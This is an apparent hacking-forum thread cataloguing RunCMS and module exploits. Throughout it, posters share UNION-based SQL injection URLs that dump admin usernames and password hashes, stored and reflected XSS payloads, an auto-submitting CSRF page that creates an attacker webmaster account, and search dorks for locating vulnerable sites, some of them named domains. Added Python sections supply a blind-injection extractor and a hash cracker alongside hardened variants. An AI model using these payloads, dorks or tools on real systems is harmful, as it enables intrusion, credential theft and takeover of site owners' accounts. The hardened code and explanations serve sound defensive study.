ANTICHAT Forum

ANTICHAT Forum (https://forum.antichat.xyz/index.php)
-   Scripts/CMF/CMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ RunCMS vulnerability overview ] (https://forum.antichat.xyz/showthread.php?t=59283)

Solide Snake 20.01.2008 04:52

[ RunCMS vulnerability overview ]

RunCMS vulnerability overview


Vendor site: www.runcms.org
Current version: 1.6.1


Exploits


Target: RunCMS <= 1.2
Impact: Arbitrary command execution
RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit

Target: RunCMS 1.5.2 and earlier
Impact: SQL injection
RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit

Target: RunCMS <= 1.6
Impact: Arbitrary command execution
RunCMS <= 1.6 Local File Inclusion Vulnerability

Target: RunCMS 1.6 and earlier
Impact: Arbitrary command execution
RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit

Target: RunCMS 1.6
Impact: SQL injection
RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit

Target: RunCMS 1.6
Impact: SQL injection
RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion)

Target: RunCMS Newbb_plus 0.92 and earlier
Impact: SQL injection
RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit


1. Multiple Blind SQL Injection

An attacker can inject SQL code in the following modules:

Code:

http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION

Example:

This query will return link to download file:

Code:

GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0

This query will return an error:

Code:

GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0

2. Stored XSS

Vulnerability found in the script modules/news/submit.php, in the POST parameter "subject".


Example:

Code:

POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0


subject=<script>alert("DSecRG_XSS")</script>


3. Linked XSS: vulnerability found in modules/news/index.php; an attacker can inject XSS via the URL string:

Example:

Code:

http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>

4. These files can be overwritten by PHP injection:

Code:

runcms_1.6\modules\sections\cache\intro.php
runcms_1.6\modules\mylinks\cache\disclaimer.php
runcms_1.6\modules\mydownloads\cache\disclaimer.php
runcms_1.6\modules\newbb_plus\cache\disclaimer.php
runcms_1.6\modules\system\cache\disclaimer.php
runcms_1.6\modules\system\cache\footer.php
runcms_1.6\modules\system\cache\header.php
runcms_1.6\modules\system\cache\maintenance.php


Version 1.3a5 XSS

Code:

http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]

RUNCMS 1.5.1 SQL Injection

Code:

http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2
//milw0rm.com

l-l00K 09.02.2008 01:45

Found a blind SQL injection in RunCMS and started checking whether it was old news; it turned out the injection had been found before me, but it isn't on Antichat, so I'm posting it. The vulnerability is in the "bid" parameter of the "modules/banners/click.php" script.
Example:
http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version(),1,1)=4
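
Worked example of the boolean-based blind injection behind the DSecRG `and 1=1` / `and 1=0` check in the first post and the `substring(version(),1,1)=4` probe in l-l00K's post above, carried through to a character-by-character extractor. This is an added example, not code from the thread or from RunCMS: the vulnerable query is a stand-in that concatenates `lid` into the SQL the way the advisories imply, run against an in-memory SQLite database with constructed tables (`mydownloads_downloads`, `runcms_users`) and one made-up row; the table and column names are assumptions, and SQLite's `unicode(substr(...))` plays the role of MySQL's `ascii(substring(...))`.

```python
import sqlite3

# Constructed stand-in database (assumed table/column names, made-up rows);
# the pass value is sha1("test"), standing in for a stored RunCMS hash.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE mydownloads_downloads (lid INTEGER, title TEXT, url TEXT);
        INSERT INTO mydownloads_downloads VALUES (1, 'Some file', 'http://example.invalid/files/1.zip');
        CREATE TABLE runcms_users (uid INTEGER, uname TEXT, pass TEXT);
        INSERT INTO runcms_users VALUES (1, 'admin', 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3');
    """)
    return conn

def vulnerable_brokenfile(conn, lid):
    """Models brokenfile.php: the lid parameter is pasted into the query text.
    Returns the download URL, or None when no row matches or the SQL fails."""
    sql = "SELECT url FROM mydownloads_downloads WHERE lid=" + lid
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None
    return row[0] if row else None

def hardened_brokenfile(conn, lid):
    """Hardened form: lid must be a decimal integer and is bound as a parameter,
    so 'and 1=1' style payloads never reach the SQL parser."""
    if not lid.isdigit():
        return None
    row = conn.execute(
        "SELECT url FROM mydownloads_downloads WHERE lid=?", (int(lid),)
    ).fetchone()
    return row[0] if row else None

def oracle(conn, condition):
    """One 'request': True when lid=1 AND <condition> still yields the link."""
    return vulnerable_brokenfile(conn, "1 and " + condition) is not None

def is_injectable(conn):
    """The DSecRG check: 'and 1=1' keeps the link, 'and 1=0' loses it."""
    return oracle(conn, "1=1") and not oracle(conn, "1=0")

def blind_extract(conn, expr, max_len=40):
    """Recover the string value of SQL query `expr` without ever seeing it:
    for each position, binary-search the character code (7 requests per char).
    MySQL form of the probe: ascii(substring((expr),i,1))>mid."""
    out = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({expr}),{i},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # substr past the end gives '' -> unicode('') is NULL -> every probe false
            break
        out += chr(lo)
    return out

if __name__ == "__main__":
    db = make_db()
    print("injectable:", is_injectable(db))
    print("admin name:", blind_extract(db, "SELECT uname FROM runcms_users WHERE uid=1"))
    print("admin hash:", blind_extract(db, "SELECT pass FROM runcms_users WHERE uid=1"))
    print("hardened:", hardened_brokenfile(db, "1 and 1=1"))
```

Against a live target every `oracle()` call is one HTTP request, so a 40-character SHA-1 costs about 280 requests; the `version()` probe from the post is the same oracle with a different expression. The hardened function shows the whole fix: the parameter is validated as an integer and bound, never concatenated.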

Elekt 13.03.2008 09:02

1) RunCMS MyAnnonces SQL Injection (cid)

Code:

# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAIL : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: "modules MyAnnonces index php pa view"
#
################################################################
EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]

EXPLOIT :

for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*


2) RunCMS 1.6.1 Multiple XSS and XSRF

HTML code:

###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilities         by NBBN
###################################################################

1) Create Webmaster (admin) XSRF Vulnerability
<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">

<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="attack@attack.com">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">

Also with XSRF an attacker can update the profile of all users. He can change
the password etc...

[b]2) Cross-Site Scripting (an attacker can only attack an admin)[/b]
<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">

<input type="text" class="text" name="rank_title" size="30" maxlength="50"
value="<marquee>Cross-Site Scritping :-("/>

<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>
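
The XSRF PoC above works because admin.php acts on any POST that arrives with the admin's session cookie. An added example, not RunCMS code and not NBBN's: a minimal handler for the addUser operation in its vulnerable shape beside a version that requires a per-session anti-CSRF token, driven with the field set from the PoC. Field names follow the PoC; the session dict, the role name "webmaster", and the `csrf_token` field name are assumptions.

```python
import hmac
import secrets

# Field set taken from the PoC form above (values kept, list shortened). Note
# there is no token in it: this is exactly what a forged cross-site POST carries.
FORGED_POST = {
    "uname": "Attacker", "name": "Attacker", "email": "attack@attack.com",
    "rank": "7", "pass": "Password", "pass2": "Password",
    "fct": "users", "op": "addUser", "submit": "Übernehmen",
}

def issue_csrf_token(session):
    """Called when the real admin form is rendered: the token is stored in the
    server-side session and echoed into the form as a hidden field."""
    token = secrets.token_hex(16)
    session["csrf_token"] = token
    return token

def vulnerable_add_user(session, form, users):
    """Models the behaviour the PoC relies on: the session cookie is the only
    thing checked, so any page the admin visits can submit this request."""
    if session.get("role") != "webmaster":
        return "forbidden"
    if form.get("fct") != "users" or form.get("op") != "addUser":
        return "ignored"
    if form["pass"] != form["pass2"]:
        return "password mismatch"
    users[form["uname"]] = {"rank": int(form["rank"])}
    return "created"

def hardened_add_user(session, form, users):
    """Same operation, but the request must carry the token issued to this
    session; a cross-site page cannot read it, so the forged POST is dropped.
    The comparison is constant-time so the token cannot be guessed byte by byte."""
    if session.get("role") != "webmaster":
        return "forbidden"
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "csrf check failed"
    return vulnerable_add_user(session, form, users)

if __name__ == "__main__":
    admin_session = {"role": "webmaster"}
    users = {}
    print(vulnerable_add_user(admin_session, FORGED_POST, users), users)   # created
    users = {}
    print(hardened_add_user(admin_session, FORGED_POST, users), users)     # csrf check failed {}
    legit = dict(FORGED_POST, csrf_token=issue_csrf_token(admin_session))
    print(hardened_add_user(admin_session, legit, users), users)           # created
```

The role check alone is what makes the XSS in the second PoC "admin only"; it does nothing against the forged POST, because the browser attaches the admin's cookie to it. Only the token, which the attacker's page cannot read across origins, separates the two requests.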


ZAMUT 13.03.2008 19:48

RUNCMS 1.6.1

Adding a comment
-----------------------------
Incorrect BB Code handling => Active XSS

Example:
Code:

[*color]</textarea>[XSS][/*color]
Component Partner Sites 1.03 SQL Injection
(Admin priv)

Exploit:
Code:

modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1
Component Web Links 1.02 SQL Injection
(Admin priv)

Exploit:
Code:

modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1
Hashing algorithm
PHP code:

$pass = sha1($username.$pass);

© ZAMUT
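
Following on from ZAMUT's note that the hash is sha1($username.$pass): an added example, not code from the thread or from RunCMS, showing what an attacker does with the uname:pass rows that the UNION payloads above pull out of runcms_users via concat(uname,0x3a,pass). The dump lines are constructed here (hashes computed from made-up passwords so the script runs offline) and the wordlist is made up; the scheme itself is the one ZAMUT states.

```python
import hashlib

def runcms_hash(uname, password):
    """The scheme ZAMUT states for 1.6.1: sha1($username.$pass). The username acts
    as a public, per-user salt: it defeats a plain sha1 lookup table, but costs
    an attacker only one SHA-1 per guess per user."""
    return hashlib.sha1((uname + password).encode("utf-8")).hexdigest()

# Constructed dump, in the uname:pass shape that concat(uname,0x3a,pass) returns;
# the passwords behind these hashes are made up for the example.
DUMP = "\n".join([
    "admin:" + runcms_hash("admin", "runcms2008"),
    "editor:" + runcms_hash("editor", "password"),
    "guest:" + runcms_hash("guest", "password"),     # same password, different hash
    "bob:" + runcms_hash("bob", "x9!Qv#2pLz"),        # not in the wordlist
    "garbage line without a hash",
])

WORDLIST = ["123456", "password", "runcms", "runcms2008", "admin", "qwerty"]

def parse_dump(text):
    """Keep only lines that look like uname:<40 hex chars>."""
    creds = {}
    for line in text.splitlines():
        uname, sep, h = line.strip().partition(":")
        if sep and len(h) == 40 and all(c in "0123456789abcdef" for c in h):
            creds[uname] = h
    return creds

def crack(creds, wordlist):
    """Per-user dictionary attack; the username must be re-prefixed for every
    guess, so work cannot be shared between users even for equal passwords."""
    recovered = {}
    for uname, h in creds.items():
        for guess in wordlist:
            if runcms_hash(uname, guess) == h:
                recovered[uname] = guess
                break
    return recovered

def plain_sha1_matches(creds, wordlist):
    """Shows why a username-less table fails here: sha1(pass) alone never matches."""
    plain = {hashlib.sha1(w.encode("utf-8")).hexdigest(): w for w in wordlist}
    return {u: plain[h] for u, h in creds.items() if h in plain}

if __name__ == "__main__":
    creds = parse_dump(DUMP)
    print(crack(creds, WORDLIST))              # {'admin': 'runcms2008', 'editor': 'password', 'guest': 'password'}
    print(plain_sha1_matches(creds, WORDLIST)) # {}
```

The practical consequence for anyone assessing a dumped runcms_users table: identical passwords do not collapse into one hash, so every user must be attacked separately, but the salt is the username column sitting right next to the hash, and a single unsalted SHA-1 per guess is cheap.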

•†•SyTiNeR•†• 21.03.2008 09:01

RunCMS Module section (artid) Remote SQL Injection Vulnerability

Code:

Cr@zy_King

crazy_kinq@hotmail.co.uk / hackshow.us

Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91

Runcms Module Section (artid) Remote SQL Inj. Vuln.

Example :

 - modules/sections/index.php?op=viewarticle&artid=Sql

 - Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2

Cr@ says: Memati won't die in Kurtlar Vadisi, nobody get excited :D

Alemin_Krali says: Totally agree (whatever that has to do with it)

Good.

# milw0rm.com [2008-03-20]


iddqd 22.03.2008 13:03

RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability
 
SQL Injection

Vulnerable: Module Photo 3.02

Exploit:
Code:

admin

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

pass

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Dork:
Code:

allinurl: "modules/photo/viewcat.php?id"
inurl:photo "powered by runcms"

© S@BUN

ZAMUT 26.04.2008 23:06

RunCMS Module nGuestBook 1.01 Active XSS

Add message => Message => [XSS]

dork: inurl:/modules/nguestbook/


SQL Injection

Vulnerable: Module Photo 4.00


Vuln code:
PHP code:

.....
include_once(PHOTO_PATH."/class/bama_cat.php");
$id = $HTTP_GET_VARS['id'];
if (isset($HTTP_GET_VARS['cid'])) {
.....

Exploit:
Code:

http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1
ZAMUT (c)

l-l00K 26.04.2008 23:38

RunCMS Module MyArticles 0.0.4-0.5 sql-inj

SQL injection in the topic_id parameter; GET is filtered, so the data has to be sent via POST.
Code:

http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users
© H00k

~!DoK_tOR!~ 27.04.2008 05:33

RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability

SQL Injection

http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL]

Code:

-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users
milw0rm.com

ZAMUT 28.04.2008 21:58

RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability

Vuln code:
PHP code:

.....
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
if ($HTTP_GET_VARS['page']) {
    $page = $HTTP_GET_VARS['page'];
.....

Exploit:
Code:

/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users
Example:
Code:

http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users
dork: /modules/HotNews/


ZAMUT(c)

